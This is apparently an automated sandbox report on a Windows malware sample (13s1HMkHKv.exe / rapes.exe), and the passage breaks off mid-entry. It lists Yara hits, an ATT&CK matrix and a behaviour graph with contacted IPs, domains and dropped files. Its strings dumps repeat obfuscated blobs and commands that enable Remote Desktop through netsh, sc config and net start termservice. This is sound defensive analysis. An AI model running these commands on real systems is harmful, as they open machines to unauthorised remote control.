                          Source: Yara matchFile source: Process Memory Space: s7MG2VL.exe PID: 8140, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ZqkKpwG.exe PID: 6364, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: eAzoDbY.exe PID: 4224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: yo7qmvz.exe PID: 2828, type: MEMORYSTR
                          Source: Yara matchFile source: 35.2.yo7qmvz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.ZqkKpwG.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.yo7qmvz.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.ZqkKpwG.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.2466972573.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2101604103.000000000096D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2464880646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: 13s1HMkHKv.exeString found in binary or memory: net start termservice
                          Source: 13s1HMkHKv.exe, 00000000.00000002.1235519901.0000000000A41000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                          Source: 13s1HMkHKv.exe, 00000000.00000002.1235519901.0000000000A41000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                          Source: rapes.exeString found in binary or memory: net start termservice
                          Source: rapes.exe, 00000003.00000002.1263210409.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                          Source: rapes.exe, 00000003.00000002.1263210409.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                          Source: rapes.exeString found in binary or memory: net start termservice
                          Source: rapes.exe, 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                          Source: rapes.exe, 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                          Source: rapes.exeString found in binary or memory: net start termservice
                          Source: rapes.exe, 0000000B.00000002.2465023881.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                          Source: rapes.exe, 0000000B.00000002.2465023881.0000000000221000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting
                          Valid Accounts12
                          Windows Management Instrumentation
                          11
                          Scripting
                          1
                          Exploitation for Privilege Escalation
                          1
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          1
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          11
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution
                          2
                          LSASS Driver
                          1
                          Abuse Elevation Control Mechanism
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          1
                          DLL Side-Loading
                          2
                          LSASS Driver
                          1
                          Abuse Elevation Control Mechanism
                          Security Account Manager12
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          3
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          2
                          Windows Service
                          1
                          DLL Side-Loading
                          41
                          Obfuscated Files or Information
                          NTDS445
                          System Information Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          124
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchd1
                          Scheduled Task/Job
                          2
                          Windows Service
                          221
                          Software Packing
                          LSA Secrets1
                          Query Registry
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled Task11
                          Registry Run Keys / Startup Folder
                          312
                          Process Injection
                          1
                          DLL Side-Loading
                          Cached Domain Credentials1181
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job
                          1
                          File Deletion
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                          Registry Run Keys / Startup Folder
                          21
                          Masquerading
                          Proc Filesystem451
                          Virtualization/Sandbox Evasion
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Modify Registry
                          /etc/passwd and /etc/shadow1
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron451
                          Virtualization/Sandbox Evasion
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                          Process Injection
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636853 Sample: 13s1HMkHKv.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 128 objects.githubusercontent.com 2->128 130 jowinjoinery.icu 2->130 132 7 other IPs or domains 2->132 156 Suricata IDS alerts for network traffic 2->156 158 Found malware configuration 2->158 160 Malicious sample detected (through community Yara rule) 2->160 162 21 other signatures 2->162 12 rapes.exe 38 2->12         started        17 13s1HMkHKv.exe 5 2->17         started        19 rapes.exe 2->19         started        signatures3 process4 dnsIp5 150 176.113.115.6, 61658, 61659, 61661 SELECTELRU Russian Federation 12->150 152 176.113.115.7, 61660, 61663, 61671 SELECTELRU Russian Federation 12->152 154 107.174.192.179, 61682, 61696, 80 AS-COLOCROSSINGUS United States 12->154 116 C:\Users\user\AppData\Local\...\dx3hXS1.exe, PE32+ 12->116 dropped 118 C:\Users\user\AppData\Local\...Zs3CZC.exe, PE32+ 12->118 dropped 120 C:\Users\user\AppData\Local\...\st22BJg.exe, PE32+ 12->120 dropped 126 13 other malicious files 12->126 dropped 230 Contains functionality to start a terminal service 12->230 232 Hides threads from debuggers 12->232 234 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->234 21 8sb9w_003.exe 12->21         started        24 st22BJg.exe 12->24         started        27 s7MG2VL.exe 12->27         started        32 5 other processes 12->32 122 C:\Users\user\AppData\Local\...\rapes.exe, PE32 17->122 dropped 124 C:\Users\user\...\rapes.exe:Zone.Identifier, ASCII 17->124 dropped 236 Detected unpacking (changes PE section rights) 17->236 238 Tries to evade debugger and weak emulator (self modifying code) 17->238 240 Tries to detect virtualization through RDTSC time measurements 17->240 242 Potentially malicious time measurement code found 17->242 30 rapes.exe 17->30         started        244 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->244 file6 signatures7 process8 dnsIp9 182 Antivirus detection for dropped file 21->182 184 Multi AV Scanner detection for dropped file 21->184 186 Query firmware table information (likely to detect VMs) 21->186 202 4 other signatures 21->202 34 svchost.exe 21->34         started        39 cmd.exe 21->39         started        102 C:\Users\user\AppData\Local\Temp\file.exe, PE32 24->102 dropped 104 C:\Users\user\AppData\Local\Temp\pack82.vbe, data 24->104 dropped 41 file.exe 24->41         started        43 wscript.exe 24->43         started        45 conhost.exe 24->45         started        142 crosshairc.life 104.21.48.1, 443, 61689 CLOUDFLARENETUS United States 27->142 144 citydisco.bet 188.114.96.3, 443, 61662, 61664 CLOUDFLARENETUS European Union 27->144 188 Detected unpacking (changes PE section rights) 27->188 190 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->190 192 Tries to detect sandboxes and other dynamic analysis tools (window names) 27->192 204 4 other signatures 27->204 194 Contains functionality to start a terminal service 30->194 196 Tries to evade debugger and weak emulator (self modifying code) 30->196 206 2 other signatures 30->206 146 github.com 140.82.121.4 GITHUBUS United States 32->146 148 objects.githubusercontent.com 185.199.108.133 FASTLYUS Netherlands 32->148 198 Contains functionality to inject code into remote processes 32->198 200 Injects a PE file into a foreign processes 32->200 47 yo7qmvz.exe 32->47         started        49 ZqkKpwG.exe 32->49         started        51 eAzoDbY.exe 32->51         started        53 6 other processes 32->53 file10 signatures11 process12 dnsIp13 134 82.29.67.160, 443, 61691, 61698 NTLGB United Kingdom 34->134 136 grabify.link 104.26.9.202, 443, 61685, 61693 CLOUDFLARENETUS United States 34->136 88 C:\Users\user\AppData\Local\Temp\...\cls.exe, PE32+ 34->88 dropped 90 C:\ProgramData\...\ps.exe, PE32+ 34->90 dropped 92 C:\ProgramData\...\ps.bat, PNG 34->92 dropped 166 Benign windows process drops PE files 34->166 168 Creates autostart registry keys with suspicious names 34->168 55 ps.exe 34->55         started        60 cls.exe 34->60         started        62 cmd.exe 34->62         started        170 Adds a directory exclusion to Windows Defender 39->170 64 powershell.exe 39->64         started        66 conhost.exe 39->66         started        94 C:\Users\user\AppData\Local\...\msvcr80.dll, 